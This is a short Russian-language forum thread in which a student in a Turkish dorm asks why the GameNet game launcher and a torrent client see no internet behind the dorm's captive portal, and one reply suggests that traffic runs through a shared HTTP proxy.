Добрый день всем, мне нужна помощь, переехал в турцию, что бы учиться в вузе. Тек вот шас в обшаге. Тут вайфай, скорость норм 60=70 мб/с. Хотел просто посмотреть что такое Black Desert Новая игра...Упс вижу приложение ГамеНет не видит сети. Тоесть как буд-то интернета нет. Что делать. И да насчет ошибок, ноут куплен в турции а тут русской вкладки нет, приходиться по памяти Панель называеться Azora Captive Panel Кто что знает? _____________________________ Попа в том что интернет есть, но именно клинет не видит Так же торент не видит сети
Наверно сеть выходит через общий прокси сервер, поэтому другого интернета помимо HTTP нет. Это не решается одним ответом, нужно исследовать сеть.